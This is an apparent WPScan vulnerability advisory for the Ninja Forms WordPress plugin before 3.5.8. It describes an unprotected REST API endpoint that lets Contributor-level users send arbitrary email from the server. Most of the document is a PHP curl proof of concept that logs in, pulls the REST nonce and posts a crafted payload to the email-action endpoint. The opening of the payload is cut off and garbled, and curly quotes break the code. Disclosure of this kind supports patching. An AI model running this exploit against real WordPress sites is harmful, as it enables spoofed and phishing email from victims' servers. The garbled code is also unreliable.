
wpvulndb · Chloe Chamberland · WPVDB-ID: B9F6DAD5-2293-482F-9EE6-DC8B4C713B80
History: Sep 22, 2021 - 12:00 a.m.

Ninja Forms < 3.5.8 - Unprotected REST-API to Email Injection

2021-09-22 00:00:00
Chloe Chamberland
wpscan.com

0.001 Low

EPSS

Percentile

21.4%

The plugin is vulnerable to arbitrary email sending via the trigger_email_action function in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7 (fixed in 3.5.8). This allows authenticated attackers — the PoC below logs in with a Contributor-level (or higher) account — to send arbitrary emails from the affected server via the /ninja-forms-submissions/email-action REST API endpoint, which can then be used to socially engineer victims.

PoC

{all_fields_table}

“,“from_name”:”“,“from_address”:”“,“reply_to”:”“,“email_format”:“html”,“cc”:”“,“bcc”:”“,“attach_csv”:”“,“email_message_plain”:”“,“parent_id”:“2”,“value”:“6”},“formID”:0}‘; // 1) Log in as contributor+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-login.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘log’ => $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Rest API Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest API Nonce preg_match(’/([^”]+)/', $content, $matches); $restnonce = $matches[1]; //Create New Post $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-json/ninja-forms-submissions/email-action’); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_PROXY, $proxy ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt( $ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’, “X-WP-Nonce: $restnonce”, “Content-Length: $length”)); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>

CPE Name | Operator | Version
ninja-forms | lt | 3.5.8

